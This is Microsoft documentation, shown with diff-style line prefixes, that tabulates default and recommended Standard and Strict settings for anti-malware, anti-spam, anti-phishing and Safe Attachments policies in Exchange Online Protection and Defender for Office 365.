- - ✅ <a href="https://learn.microsoft.com/microsoft-365/security/defender/microsoft-365-defender" target="_blank">Microsoft Defender XDR</a>
--
-# Recommended settings for EOP and Microsoft Defender for Office 365 security
--
-**Exchange Online Protection (EOP)** is the core of security for Microsoft 365 subscriptions and helps keep malicious emails from reaching your employee's inboxes. But with new, more sophisticated attacks emerging every day, improved protections are often required. **Microsoft Defender for Office 365** Plan 1 or Plan 2 contain additional features that give more layers of security, control, and investigation.
-
-Although we empower security administrators to customize their security settings, there are two security levels in EOP and Microsoft Defender for Office 365 that we recommend: **Standard** and **Strict**. Although customer environments and needs are different, these levels of filtering help prevent unwanted mail from reaching your employees' Inbox in most situations.
-
-To automatically apply the Standard or Strict settings to users, see [Preset security policies in EOP and Microsoft Defender for Office 365](preset-security-policies.md).
-
-This article describes the default settings, and also the recommended Standard and Strict settings to help protect your users. The tables contain the settings in the Microsoft Defender portal and PowerShell (Exchange Online PowerShell or standalone Exchange Online Protection PowerShell for organizations without Exchange Online mailboxes).
-
-> [!NOTE]
-> The Office 365 Advanced Threat Protection Recommended Configuration Analyzer (ORCA) module for PowerShell can help admins find the current values of these settings. Specifically, the **Get-ORCAReport** cmdlet generates an assessment of anti-spam, anti-phishing, and other message hygiene settings. You can download the ORCA module at <https://www.powershellgallery.com/packages/ORCA/>.
->
-> In Microsoft 365 organizations, we recommend that you leave the Junk Email Filter in Outlook set to **No automatic filtering** to prevent unnecessary conflicts (both positive and negative) with the spam filtering verdicts from EOP. For more information, see the following articles:
->
-> - [Configure junk email settings on Exchange Online mailboxes](configure-junk-email-settings-on-exo-mailboxes.md)
-> - [About junk email settings in Outlook](configure-junk-email-settings-on-exo-mailboxes.md#about-junk-email-settings-in-outlook)
-> - [Change the level of protection in the Junk Email Filter](https://support.microsoft.com/office/e89c12d8-9d61-4320-8c57-d982c8d52f6b)
-> - [Create safe sender lists in EOP](create-safe-sender-lists-in-office-365.md)
-> - [Create blocked sender lists in EOP](create-block-sender-lists-in-office-365.md)
-
-## Anti-spam, anti-malware, and anti-phishing protection in EOP
-
-Anti-spam, anti-malware, and anti-phishing are EOP features that can be configured by admins. We recommend the following Standard or Strict configurations.
-
-### EOP anti-malware policy settings
-
-To create and configure anti-malware policies, see [Configure anti-malware policies in EOP](anti-malware-policies-configure.md).
-
-Quarantine policies define what users are able to do to quarantined messages, and whether users receive quarantine notifications. For more information, see [Anatomy of a quarantine policy](quarantine-policies.md#anatomy-of-a-quarantine-policy).
-
-The policy named AdminOnlyAccessPolicy enforces the historical capabilities for messages that were quarantined as malware as described in the table [here](quarantine-end-user.md).
-
-Users can't release their own messages that were quarantined as malware, regardless of how the quarantine policy is configured. If the policy allows users to release their own quarantined messages, users are instead allowed to _request_ the release of their quarantined malware messages.
-
-|Security feature name|Default|Standard|Strict|Comment|
-||::|::|::||
-|**Protection settings**|||||
-|**Enable the common attachments filter** (_EnableFileFilter_)|Selected (`$true`)<sup>\*</sup>|Selected (`$true`)|Selected (`$true`)|For the list of file types in the common attachments filter, see [Common attachments filter in anti-malware policies](anti-malware-protection-about.md#common-attachments-filter-in-anti-malware-policies). <br><br> <sup>\*</sup> The common attachments filter is **on** by default in new anti-malware policies that you create in the Defender portal or in PowerShell, and in the default anti-malware policy in organizations created after December 1, 2023.|
-|Common attachment filter notifications: **When these file types are found** (_FileTypeAction_)|**Reject the message with a non-delivery report (NDR)** (`Reject`)|**Reject the message with a non-delivery report (NDR)** (`Reject`)|**Reject the message with a non-delivery report (NDR)** (`Reject`)||
-|**Enable zero-hour auto purge for malware** (_ZapEnabled_)|Selected (`$true`)|Selected (`$true`)|Selected (`$true`)||
-|**Quarantine policy** (_QuarantineTag_)|AdminOnlyAccessPolicy|AdminOnlyAccessPolicy|AdminOnlyAccessPolicy||
-|**Admin notifications**|||||
-|**Notify an admin about undelivered messages from internal senders** (_EnableInternalSenderAdminNotifications_ and _InternalSenderAdminAddress_)|Not selected (`$false`)|Not selected (`$false`)|Not selected (`$false`)|We have no specific recommendation for this setting.|
-|**Notify an admin about undelivered messages from external senders** (_EnableExternalSenderAdminNotifications_ and _ExternalSenderAdminAddress_)|Not selected (`$false`)|Not selected (`$false`)|Not selected (`$false`)|We have no specific recommendation for this setting.|
-|**Customize notifications**||||We have no specific recommendations for these settings.|
-|**Use customized notification text** (_CustomNotifications_)|Not selected (`$false`)|Not selected (`$false`)|Not selected (`$false`)||
-|**From name** (_CustomFromName_)|Blank|Blank|Blank||
-|**From address** (_CustomFromAddress_)|Blank|Blank|Blank||
-|**Customize notifications for messages from internal senders**||||These settings are used only if **Notify an admin about undelivered messages from internal senders** is selected.|
-|**Subject** (_CustomInternalSubject_)|Blank|Blank|Blank||
-|**Message** (_CustomInternalBody_)|Blank|Blank|Blank||
-|**Customize notifications for messages from external senders**||||These settings are used only if **Notify an admin about undelivered messages from external senders** is selected.|
-|**Subject** (_CustomExternalSubject_)|Blank|Blank|Blank||
-|**Message** (_CustomExternalBody_)|Blank|Blank|Blank||
-
-### EOP anti-spam policy settings
-
-To create and configure anti-spam policies, see [Configure anti-spam policies in EOP](anti-spam-policies-configure.md).
-
-Wherever you select **Quarantine message** as the action for a spam filter verdict, a **Select quarantine policy** box is available. Quarantine policies define what users are able to do to quarantined messages, and whether users receive quarantine notifications. For more information, see [Anatomy of a quarantine policy](quarantine-policies.md#anatomy-of-a-quarantine-policy).
-
-If you _change_ the action of a spam filtering verdict to **Quarantine message** when you create anti-spam policies the Defender portal, the **Select quarantine policy** box is blank by default. A blank value means the default quarantine policy for that spam filtering verdict is used. These default quarantine policies enforce the historical capabilities for the spam filter verdict that quarantined the message as described in the table [here](quarantine-end-user.md). When you later view or edit the anti-spam policy settings, the quarantine policy name is shown.
-
-Admins can create or use quarantine policies with more restrictive or less restrictive capabilities. For instructions, see [Create quarantine policies in the Microsoft Defender portal](quarantine-policies.md#step-1-create-quarantine-policies-in-the-microsoft-defender-portal).
-
-|Security feature name|Default|Standard|Strict|Comment|
-||::|::|::||
-|**Bulk email threshold & spam properties**|||||
-|**Bulk email threshold** (_BulkThreshold_)|7|6|5|For details, see [Bulk complaint level (BCL) in EOP](anti-spam-bulk-complaint-level-bcl-about.md).|
-|**Bulk email spam** (_MarkAsSpamBulkMail_)|(`On`)|(`On`)|(`On`)|This setting is only available in PowerShell.|
-|**Increase spam score** settings||||All of these settings are part of the Advanced Spam Filter (ASF). For more information, see the [ASF settings in anti-spam policies](#asf-settings-in-anti-spam-policies) section in this article.|
-|**Mark as spam** settings||||Most of these settings are part of ASF. For more information, see the [ASF settings in anti-spam policies](#asf-settings-in-anti-spam-policies) section in this article.|
-|**Contains specific languages** (_EnableLanguageBlockList_ and _LanguageBlockList_)|**Off** (`$false` and Blank)|**Off** (`$false` and Blank)|**Off** (`$false` and Blank)|We have no specific recommendation for this setting. You can block messages in specific languages based on your business needs.|
-|**From these countries** (_EnableRegionBlockList_ and _RegionBlockList_)|**Off** (`$false` and Blank)|**Off** (`$false` and Blank)|**Off** (`$false` and Blank)|We have no specific recommendation for this setting. You can block messages from specific countries/regions based on your business needs.|
-|**Test mode** (_TestModeAction_)|**None**|**None**|**None**|This setting is part of ASF. For more information, see the [ASF settings in anti-spam policies](#asf-settings-in-anti-spam-policies) section in this article.|
-|**Actions**|||||
-|**Spam** detection action (_SpamAction_)|**Move message to Junk Email folder** (`MoveToJmf`)|**Move message to Junk Email folder** (`MoveToJmf`)|**Quarantine message** (`Quarantine`)||
-|**Quarantine policy** for **Spam** (_SpamQuarantineTag_)|DefaultFullAccessPolicy┬╣|DefaultFullAccessPolicy|DefaultFullAccessWithNotificationPolicy|The quarantine policy is meaningful only if spam detections are quarantined.|
-|**High confidence spam** detection action (_HighConfidenceSpamAction_)|**Move message to Junk Email folder** (`MoveToJmf`)|**Quarantine message** (`Quarantine`)|**Quarantine message** (`Quarantine`)||
-|**Quarantine policy** for **High confidence spam** (_HighConfidenceSpamQuarantineTag_)|DefaultFullAccessPolicy┬╣|DefaultFullAccessWithNotificationPolicy|DefaultFullAccessWithNotificationPolicy|The quarantine policy is meaningful only if high confidence spam detections are quarantined.|
-|**Phishing** detection action (_PhishSpamAction_)|**Move message to Junk Email folder** (`MoveToJmf`)<sup>\*</sup>|**Quarantine message** (`Quarantine`)|**Quarantine message** (`Quarantine`)|<sup>\*</sup> The default value is **Move message to Junk Email folder** in the default anti-spam policy and in new anti-spam policies that you create in PowerShell. The default value is **Quarantine message** in new anti-spam policies that you create in the Defender portal.|
-|**Quarantine policy** for **Phishing** (_PhishQuarantineTag_)|DefaultFullAccessPolicy┬╣|DefaultFullAccessWithNotificationPolicy|DefaultFullAccessWithNotificationPolicy|The quarantine policy is meaningful only if phishing detections are quarantined.|
-|**High confidence phishing** detection action (_HighConfidencePhishAction_)|**Quarantine message** (`Quarantine`)|**Quarantine message** (`Quarantine`)|**Quarantine message** (`Quarantine`)|Users can't release their own messages that were quarantined as high confidence phishing, regardless of how the quarantine policy is configured. If the policy allows users to release their own quarantined messages, users are instead allowed to _request_ the release of their quarantined high confidence phishing messages.|
-|**Quarantine policy** for **High confidence phishing** (_HighConfidencePhishQuarantineTag_)|AdminOnlyAccessPolicy|AdminOnlyAccessPolicy|AdminOnlyAccessPolicy||
-|**Bulk compliant level (BCL) met or exceeded** (_BulkSpamAction_)|**Move message to Junk Email folder** (`MoveToJmf`)|**Move message to Junk Email folder** (`MoveToJmf`)|**Quarantine message** (`Quarantine`)||
-|**Quarantine policy** for **Bulk compliant level (BCL) met or exceeded** (_BulkQuarantineTag_)|DefaultFullAccessPolicy┬╣|DefaultFullAccessPolicy|DefaultFullAccessWithNotificationPolicy|The quarantine policy is meaningful only if bulk detections are quarantined.|
-|**Intra-Organizational messages to take action on** (_IntraOrgFilterState_)|**Default** (Default)|**Default** (Default)|**Default** (Default)|The value **Default** is the same as selecting **High confidence phishing messages**. Currently, in U.S. Government organizations (Microsoft 365 GCC, GCC High, and DoD), the value **Default** is the same as selecting **None**.|
-|**Retain spam in quarantine for this many days** (_QuarantineRetentionPeriod_)|15 days|30 days|30 days|This value also affects messages that are quarantined by anti-phishing policies. For more information, see [Quarantine retention](quarantine-about.md#quarantine-retention).|
-|**Enable spam safety tips** (_InlineSafetyTipsEnabled_)|Selected (`$true`)|Selected (`$true`)|Selected (`$true`)||
-|Enable zero-hour auto purge (ZAP) for phishing messages (_PhishZapEnabled_)|Selected (`$true`)|Selected (`$true`)|Selected (`$true`)||
-|Enable ZAP for spam messages (_SpamZapEnabled_)|Selected (`$true`)|Selected (`$true`)|Selected (`$true`)||
-|**Allow & block list**|||||
-|Allowed senders (_AllowedSenders_)|None|None|None||
-|Allowed sender domains (_AllowedSenderDomains_)|None|None|None|Adding domains to the allowed domains list is a very bad idea. Attackers would be able to send you email that would otherwise be filtered out. <br><br> Use the [spoof intelligence insight](anti-spoofing-spoof-intelligence.md) and the [Tenant Allow/Block List](tenant-allow-block-list-email-spoof-configure.md#spoofed-senders-in-the-tenant-allowblock-list) to review all senders who are spoofing sender email addresses in your organization's email domains or spoofing sender email addresses in external domains.|
-|Blocked senders (_BlockedSenders_)|None|None|None||
-|Blocked sender domains (_BlockedSenderDomains_)|None|None|None||
-
-┬╣ As described in [Full access permissions and quarantine notifications](quarantine-policies.md#full-access-permissions-and-quarantine-notifications), your organization might use NotificationEnabledPolicy instead of DefaultFullAccessPolicy in the default security policy or in new custom security policies that you create. The only difference between these two quarantine policies is quarantine notifications are turned on in NotificationEnabledPolicy and turned off in DefaultFullAccessPolicy.
-
-#### ASF settings in anti-spam policies
-
-For more information about Advanced Spam Filter (ASF) settings in anti-spam policies, see [Advanced Spam Filter (ASF) settings in EOP](anti-spam-policies-asf-settings-about.md).
-
-|Security feature name|Default|Recommended<br>Standard|Recommended<br>Strict|Comment|
-||::|::|::||
-|**Image links to remote sites** (_IncreaseScoreWithImageLinks_)|Off|Off|Off||
-|**Numeric IP address in URL** (_IncreaseScoreWithNumericIps_)|Off|Off|Off||
-|**URL redirect to other port** (_IncreaseScoreWithRedirectToOtherPort_)|Off|Off|Off||
-|**Links to .biz or .info websites** (_IncreaseScoreWithBizOrInfoUrls_)|Off|Off|Off||
-|**Empty messages** (_MarkAsSpamEmptyMessages_)|Off|Off|Off||
-|**Embed tags in HTML** (_MarkAsSpamEmbedTagsInHtml_)|Off|Off|Off||
-|**JavaScript or VBScript in HTML** (_MarkAsSpamJavaScriptInHtml_)|Off|Off|Off||
-|**Form tags in HTML** (_MarkAsSpamFormTagsInHtml_)|Off|Off|Off||
-|**Frame or iframe tags in HTML** (_MarkAsSpamFramesInHtml_)|Off|Off|Off||
-|**Web bugs in HTML** (_MarkAsSpamWebBugsInHtml_)|Off|Off|Off||
-|**Object tags in HTML** (_MarkAsSpamObjectTagsInHtml_)|Off|Off|Off||
-|**Sensitive words** (_MarkAsSpamSensitiveWordList_)|Off|Off|Off||
-|**SPF record: hard fail** (_MarkAsSpamSpfRecordHardFail_)|Off|Off|Off||
-|**Sender ID filtering hard fail** (_MarkAsSpamFromAddressAuthFail_)|Off|Off|Off||
-|**Backscatter** (_MarkAsSpamNdrBackscatter_)|Off|Off|Off||
-|**Test mode** (_TestModeAction_)|None|None|None|For ASF settings that support **Test** as an action, you can configure the test mode action to **None**, **Add default X-Header text**, or **Send Bcc message** (`None`, `AddXHeader`, or `BccMessage`). For more information, see [Enable, disable, or test ASF settings](anti-spam-policies-asf-settings-about.md#enable-disable-or-test-asf-settings).|
-
-> [!NOTE]
-> ASF adds `X-CustomSpam:` X-header fields to messages _after_ the messages have been processed by Exchange mail flow rules (also known as transport rules), so you can't use mail flow rules to identify and act on messages that were filtered by ASF.
-
-#### EOP outbound spam policy settings
-
-To create and configure outbound spam policies, see [Configure outbound spam filtering in EOP](outbound-spam-policies-configure.md).
-
-For more information about the default sending limits in the service, see [Sending limits](/office365/servicedescriptions/exchange-online-service-description/exchange-online-limits#sending-limits-1).
-
-> [!NOTE]
-> Outbound spam policies are not part of Standard or Strict preset security policies. The **Standard** and **Strict** values indicate our **recommended** values in the default outbound spam policy or custom outbound spam policies that you create.
-
-|Security feature name|Default|Recommended<br>Standard|Recommended<br>Strict|Comment|
-||::|::|::||
-|**Set an external message limit** (_RecipientLimitExternalPerHour_)|0|500|400|The default value 0 means use the service defaults.|
-|**Set an internal message limit** (_RecipientLimitInternalPerHour_)|0|1000|800|The default value 0 means use the service defaults.|
-|**Set a daily message limit** (_RecipientLimitPerDay_)|0|1000|800|The default value 0 means use the service defaults.|
-|**Restriction placed on users who reach the message limit** (_ActionWhenThresholdReached_)|**Restrict the user from sending mail until the following day** (`BlockUserForToday`)|**Restrict the user from sending mail** (`BlockUser`)|**Restrict the user from sending mail** (`BlockUser`)||
-|**Automatic forwarding rules** (_AutoForwardingMode_)|**Automatic - System-controlled** (`Automatic`)|**Automatic - System-controlled** (`Automatic`)|**Automatic - System-controlled** (`Automatic`)|
-|**Send a copy of outbound messages that exceed these limits to these users and groups** (_BccSuspiciousOutboundMail_ and _BccSuspiciousOutboundAdditionalRecipients_)|Not selected (`$false` and Blank)|Not selected (`$false` and Blank)|Not selected (`$false` and Blank)|We have no specific recommendation for this setting. <br><br> This setting works only in the default outbound spam policy. It doesn't work in custom outbound spam policies that you create.|
-|**Notify these users and groups if a sender is blocked due to sending outbound spam** (_NotifyOutboundSpam_ and _NotifyOutboundSpamRecipients_)|Not selected (`$false` and Blank)|Not selected (`$false` and Blank)|Not selected (`$false` and Blank)|The default [alert policy](/purview/alert-policies#threat-management-alert-policies) named **User restricted from sending email** already sends email notifications to members of the **TenantAdmins** (**Global admins**) group when users are blocked due to exceeding the limits in policy. **We strongly recommend that you use the alert policy rather than this setting in the outbound spam policy to notify admins and other users**. For instructions, see [Verify the alert settings for restricted users](outbound-spam-restore-restricted-users.md#verify-the-alert-settings-for-restricted-users).|
-
-### EOP anti-phishing policy settings
-
-For more information about these settings, see [Spoof settings](anti-phishing-policies-about.md#spoof-settings). To configure these settings, see [Configure anti-phishing policies in EOP](anti-phishing-policies-eop-configure.md).
-
-The spoof settings are inter-related, but the **Show first contact safety tip** setting has no dependency on spoof settings.
-
-Quarantine policies define what users are able to do to quarantined messages, and whether users receive quarantine notifications. For more information, see [Anatomy of a quarantine policy](quarantine-policies.md#anatomy-of-a-quarantine-policy).
-
-Although the **Apply quarantine policy** value appears unselected when you create an anti-phishing policy in the Defender portal, the quarantine policy named DefaultFullAccessPolicy┬╣ is used if you don't select a quarantine policy. This policy enforces the historical capabilities for messages that were quarantined as spoof as described in the table [here](quarantine-end-user.md). When you later view or edit the quarantine policy settings, the quarantine policy name is shown.
-
-Admins can create or use quarantine policies with more restrictive or less restrictive capabilities. For instructions, see [Create quarantine policies in the Microsoft Defender portal](quarantine-policies.md#step-1-create-quarantine-policies-in-the-microsoft-defender-portal).
-
-|Security feature name|Default|Standard|Strict|Comment|
-||::|::|::||
-|**Phishing threshold & protection**|||||
-|**Enable spoof intelligence** (_EnableSpoofIntelligence_)|Selected (`$true`)|Selected (`$true`)|Selected (`$true`)||
-|**Actions**|||||
-|**Honor DMARC record policy when the message is detected as spoof** (_HonorDmarcPolicy_)|Selected (`$true`)|Selected (`$true`)|Selected (`$true`)|When this setting is turned on, you control what happens to messages where the sender fails explicit [DMARC](email-authentication-dmarc-configure.md) checks when the policy action in the DMARC TXT record is set to `p=quarantine` or `p=reject`. For more information, see [Spoof protection and sender DMARC policies](anti-phishing-policies-about.md#spoof-protection-and-sender-dmarc-policies).|
-|**If the message is detected as spoof and DMARC Policy is set as p=quarantine** (_DmarcQuarantineAction_)|**Quarantine the message** (`Quarantine`)|**Quarantine the message** (`Quarantine`)|**Quarantine the message** (`Quarantine`)|This action is meaningful only when **Honor DMARC record policy when the message is detected as spoof** is turned on.|
-|**If the message is detected as spoof and DMARC Policy is set as p=reject** (_DmarcRejectAction_)|**Reject the message** (`Reject`)|**Reject the message** (`Reject`)|**Reject the message** (`Reject`)|This action is meaningful only when **Honor DMARC record policy when the message is detected as spoof** is turned on.|
-|**If the message is detected as spoof by spoof intelligence** (_AuthenticationFailAction_)|**Move the message to the recipients' Junk Email folders** (`MoveToJmf`)|**Move the message to the recipients' Junk Email folders** (`MoveToJmf`)|**Quarantine the message** (`Quarantine`)|This setting applies to spoofed senders that were automatically blocked as shown in the [spoof intelligence insight](anti-spoofing-spoof-intelligence.md) or manually blocked in the [Tenant Allow/Block List](tenant-allow-block-list-email-spoof-configure.md#create-block-entries-for-spoofed-senders). <br><br> If you select **Quarantine the message** as the action for the spoof verdict, an **Apply quarantine policy** box is available.|
-|**Quarantine policy** for **Spoof** (_SpoofQuarantineTag_)|DefaultFullAccessPolicy┬╣|DefaultFullAccessPolicy|DefaultFullAccessWithNotificationPolicy|The quarantine policy is meaningful only if spoof detections are quarantined.|
-|**Show first contact safety tip** (_EnableFirstContactSafetyTips_)|Not selected (`$false`)|Selected (`$true`)|Selected (`$true`)|For more information, see [First contact safety tip](anti-phishing-policies-about.md#first-contact-safety-tip).|
-|**Show (?) for unauthenticated senders for spoof** (_EnableUnauthenticatedSender_)|Selected (`$true`)|Selected (`$true`)|Selected (`$true`)|Adds a question mark (?) to the sender's photo in Outlook for unidentified spoofed senders. For more information, see [Unauthenticated sender indicators](anti-phishing-policies-about.md#unauthenticated-sender-indicators).|
-|**Show "via" tag** (_EnableViaTag_)|Selected (`$true`)|Selected (`$true`)|Selected (`$true`)|Adds a via tag (chris@contoso.com via fabrikam.com) to the From address if it's different from the domain in the DKIM signature or the **MAIL FROM** address. <br><br> For more information, see [Unauthenticated sender indicators](anti-phishing-policies-about.md#unauthenticated-sender-indicators).|
-
-┬╣ As described in [Full access permissions and quarantine notifications](quarantine-policies.md#full-access-permissions-and-quarantine-notifications), your organization might use NotificationEnabledPolicy instead of DefaultFullAccessPolicy in the default security policy or in new custom security policies that you create. The only difference between these two quarantine policies is quarantine notifications are turned on in NotificationEnabledPolicy and turned off in DefaultFullAccessPolicy.
-
-## Microsoft Defender for Office 365 security
-
-Additional security benefits come with a Microsoft Defender for Office 365 subscription. For the latest news and information, you can see [What's new in Defender for Office 365](defender-for-office-365-whats-new.md).
-
-> [!IMPORTANT]
->
-> - The default anti-phishing policy in Microsoft Defender for Office 365 provides [spoof protection](anti-phishing-policies-about.md#spoof-settings) and mailbox intelligence for all recipients. However, the other available [impersonation protection](#impersonation-settings-in-anti-phishing-policies-in-microsoft-defender-for-office-365) features and [advanced settings](#advanced-settings-in-anti-phishing-policies-in-microsoft-defender-for-office-365) are not configured or enabled in the default policy. To enable all protection features, use one of the following methods:
-> - Turn on and use the Standard and/or Strict [preset security policies](preset-security-policies.md) and configure impersonation protection there.
-> - Modify the default anti-phishing policy.
-> - Create additional anti-phishing policies.
->
-> - Although there's no default Safe Attachments policy or Safe Links policy, the **Built-in protection** preset security policy provides Safe Attachments protection and Safe Links protection to all recipients who aren't defined in the Standard preset security policy, the Strict preset security policy, or in custom Safe Attachments or Safe Links policies). For more information, see [Preset security policies in EOP and Microsoft Defender for Office 365](preset-security-policies.md).
->
-> - [Safe Attachments for SharePoint, OneDrive, and Microsoft Teams](safe-attachments-for-spo-odfb-teams-about.md) protection and [Safe Documents](safe-documents-in-e5-plus-security-about.md) protection have no dependencies on Safe Links policies.
-
-If your subscription includes Microsoft Defender for Office 365 or if you've purchased Defender for Office 365 as an add-on, set the following Standard or Strict configurations.
-
-### Anti-phishing policy settings in Microsoft Defender for Office 365
-
-EOP customers get basic anti-phishing as previously described, but Defender for Office 365 includes more features and control to help prevent, detect, and remediate against attacks. To create and configure these policies, see [Configure anti-phishing policies in Defender for Office 365](anti-phishing-policies-mdo-configure.md).
-
-#### Advanced settings in anti-phishing policies in Microsoft Defender for Office 365
-
-For more information about this setting, see [Advanced phishing thresholds in anti-phishing policies in Microsoft Defender for Office 365](anti-phishing-policies-about.md#advanced-phishing-thresholds-in-anti-phishing-policies-in-microsoft-defender-for-office-365). To configure this setting, see [Configure anti-phishing policies in Defender for Office 365](anti-phishing-policies-mdo-configure.md).
-
-|Security feature name|Default|Standard|Strict|Comment|
-||::|::|::||
-|**Phishing email threshold** (_PhishThresholdLevel_)|**1 - Standard** (`1`)|**3 - More aggressive** (`3`)|**4 - Most aggressive** (`4`)||
-
-#### Impersonation settings in anti-phishing policies in Microsoft Defender for Office 365
-
-For more information about these settings, see [Impersonation settings in anti-phishing policies in Microsoft Defender for Office 365](anti-phishing-policies-about.md#impersonation-settings-in-anti-phishing-policies-in-microsoft-defender-for-office-365). To configure these settings, see [Configure anti-phishing policies in Defender for Office 365](anti-phishing-policies-mdo-configure.md).
-
-Wherever you select **Quarantine the message** as the action for an impersonation verdict, an **Apply quarantine policy** box is available. Quarantine policies define what users are able to do to quarantined messages, and whether users receive quarantine notifications. For more information, see [Anatomy of a quarantine policy](quarantine-policies.md#anatomy-of-a-quarantine-policy).
-
-Although the **Apply quarantine policy** value appears unselected when you create an anti-phishing policy in the Defender portal, the quarantine policy named DefaultFullAccessPolicy is used if you don't select a quarantine policy. This policy enforces the historical capabilities for messages that were quarantined as impersonation as described in the table [here](quarantine-end-user.md). When you later view or edit the quarantine policy settings, the quarantine policy name is shown.
-
-Admins can create or use quarantine policies with more restrictive or less restrictive capabilities. For instructions, see [Create quarantine policies in the Microsoft Defender portal](quarantine-policies.md#step-1-create-quarantine-policies-in-the-microsoft-defender-portal).
-
-|Security feature name|Default|Standard|Strict|Comment|
-||::|::|::||
-|**Phishing threshold & protection**|||||
-|User impersonation protection: **Enable users to protect** (_EnableTargetedUserProtection_ and _TargetedUsersToProtect_)|Not selected (`$false` and none)|Selected (`$true` and \<list of users\>)|Selected (`$true` and \<list of users\>)|We recommend adding users (message senders) in key roles. Internally, protected senders might be your CEO, CFO, and other senior leaders. Externally, protected senders could include council members or your board of directors.|
-|Domain impersonation protection: **Enable domains to protect**|Not selected|Selected|Selected||
-|**Include domains I own** (_EnableOrganizationDomainsProtection_)|Off (`$false`)|Selected (`$true`)|Selected (`$true`)||
-|**Include custom domains** (_EnableTargetedDomainsProtection_ and _TargetedDomainsToProtect_)|Off (`$false` and none)|Selected (`$true` and \<list of domains\>)|Selected (`$true` and \<list of domains\>)|We recommend adding domains (sender domains) that you don't own, but you frequently interact with.|
-|**Add trusted senders and domains** (_ExcludedSenders_ and _ExcludedDomains_)|None|None|None|Depending on your organization, we recommend adding senders or domains that are incorrectly identified as impersonation attempts.|
-|**Enable mailbox intelligence** (_EnableMailboxIntelligence_)|Selected (`$true`)|Selected (`$true`)|Selected (`$true`)||
-|**Enable intelligence for impersonation protection** (_EnableMailboxIntelligenceProtection_)|Off (`$false`)|Selected (`$true`)|Selected (`$true`)|This setting allows the specified action for impersonation detections by mailbox intelligence.|
-|**Actions**|||||
-|**If a message is detected as user impersonation** (_TargetedUserProtectionAction_)|**Don't apply any action** (`NoAction`)|**Quarantine the message** (`Quarantine`)|**Quarantine the message** (`Quarantine`)||
-|**Quarantine policy** for **user impersonation** (_TargetedUserQuarantineTag_)|DefaultFullAccessPolicy┬╣|DefaultFullAccessWithNotificationPolicy|DefaultFullAccessWithNotificationPolicy|The quarantine policy is meaningful only if user impersonation detections are quarantined.|
-|**If a message is detected as domain impersonation** (_TargetedDomainProtectionAction_)|**Don't apply any action** (`NoAction`)|**Quarantine the message** (`Quarantine`)|**Quarantine the message** (`Quarantine`)||
-|**Quarantine policy** for **domain impersonation** (_TargetedDomainQuarantineTag_)|DefaultFullAccessPolicy┬╣|DefaultFullAccessWithNotificationPolicy|DefaultFullAccessWithNotificationPolicy|The quarantine policy is meaningful only if domain impersonation detections are quarantined.|
-|**If mailbox intelligence detects an impersonated user** (_MailboxIntelligenceProtectionAction_)|**Don't apply any action** (`NoAction`)|**Move the message to the recipients' Junk Email folders** (`MoveToJmf`)|**Quarantine the message** (`Quarantine`)||
-|**Quarantine policy** for **mailbox intelligence impersonation** (_MailboxIntelligenceQuarantineTag_)|DefaultFullAccessPolicy┬╣|DefaultFullAccessPolicy|DefaultFullAccessWithNotificationPolicy|The quarantine policy is meaningful only if mailbox intelligence detections are quarantined.|
-|**Show user impersonation safety tip** (_EnableSimilarUsersSafetyTips_)|Off (`$false`)|Selected (`$true`)|Selected (`$true`)||
-|**Show domain impersonation safety tip** (_EnableSimilarDomainsSafetyTips_)|Off (`$false`)|Selected (`$true`)|Selected (`$true`)||
-|**Show user impersonation unusual characters safety tip** (_EnableUnusualCharactersSafetyTips_)|Off (`$false`)|Selected (`$true`)|Selected (`$true`)||
-
-┬╣ As described in [Full access permissions and quarantine notifications](quarantine-policies.md#full-access-permissions-and-quarantine-notifications), your organization might use NotificationEnabledPolicy instead of DefaultFullAccessPolicy in the default security policy or in new custom security policies that you create. The only difference between these two quarantine policies is quarantine notifications are turned on in NotificationEnabledPolicy and turned off in DefaultFullAccessPolicy.
-
-#### EOP anti-phishing policy settings in Microsoft Defender for Office 365
-
-These are the same settings that are available in [anti-spam policy settings in EOP](#eop-anti-spam-policy-settings).
-
-### Safe Attachments settings
-
-Safe Attachments in Microsoft Defender for Office 365 includes global settings that have no relationship to Safe Attachments policies, and settings that are specific to each Safe Links policy. For more information, see [Safe Attachments in Defender for Office 365](safe-attachments-about.md).
-
-Although there's no default Safe Attachments policy, the **Built-in protection** preset security policy provides Safe Attachments protection to all recipients who aren't defined in the Standard or Strict preset security policies or in custom Safe Attachments policies. For more information, see [Preset security policies in EOP and Microsoft Defender for Office 365](preset-security-policies.md).
-
-#### Global settings for Safe Attachments
-
-> [!NOTE]
-> The global settings for Safe Attachments are set by the **Built-in protection** preset security policy, but not by the **Standard** or **Strict** preset security policies. Either way, admins can modify these global Safe Attachments settings at any time.
->
-> The **Default** column shows the values before the existence of the **Built-in protection** preset security policy. The **Built-in protection** column shows the values that are set by the **Built-in protection** preset security policy, which are also our recommended values.
-
-To configure these settings, see [Turn on Safe Attachments for SharePoint, OneDrive, and Microsoft Teams](safe-attachments-for-spo-odfb-teams-configure.md) and [Safe Documents in Microsoft 365 E5](safe-documents-in-e5-plus-security-about.md).
-
-In PowerShell, you use the [Set-AtpPolicyForO365](/powershell/module/exchange/set-atppolicyforo365) cmdlet for these settings.
-
-|Security feature name|Default|Built-in protection|Comment|
-||::|::||
-|**Turn on Defender for Office 365 for SharePoint, OneDrive, and Microsoft Teams** (_EnableATPForSPOTeamsODB_)|Off (`$false`)|On (`$true`)|To prevent users from downloading malicious files, see [Use SharePoint Online PowerShell to prevent users from downloading malicious files](safe-attachments-for-spo-odfb-teams-configure.md#step-2-recommended-use-sharepoint-online-powershell-to-prevent-users-from-downloading-malicious-files).|
-|**Turn on Safe Documents for Office clients** (_EnableSafeDocs_)|Off (`$false`)|On (`$true`)|This feature is available and meaningful only with licenses that aren't included in Defender for Office 365 (for example, Microsoft 365 A5 or Microsoft 365 E5 Security). For more information, see [Safe Documents in Microsoft 365 A5 or E5 Security](safe-documents-in-e5-plus-security-about.md).|
-|**Allow people to click through Protected View even if Safe Documents identified the file as malicious** (_AllowSafeDocsOpen_)|Off (`$false`)|Off (`$false`)|This setting is related to Safe Documents.|
-
-#### Safe Attachments policy settings
-
-To configure these settings, see [Set up Safe Attachments policies in Defender for Office 365](safe-attachments-policies-configure.md).
-
-In PowerShell, you use the [New-SafeAttachmentPolicy](/powershell/module/exchange/new-safeattachmentpolicy) and [Set-SafeAttachmentPolicy](/powershell/module/exchange/set-safelinkspolicy) cmdlets for these settings.
-
-> [!NOTE]
-> As described earlier, although there's no default Safe Attachments policy, the **Built-in protection** preset security policy provides Safe Attachments protection to all recipients who aren't defined in the Standard preset security policy, the Strict preset security policy, or in custom Safe Attachments policies.
->
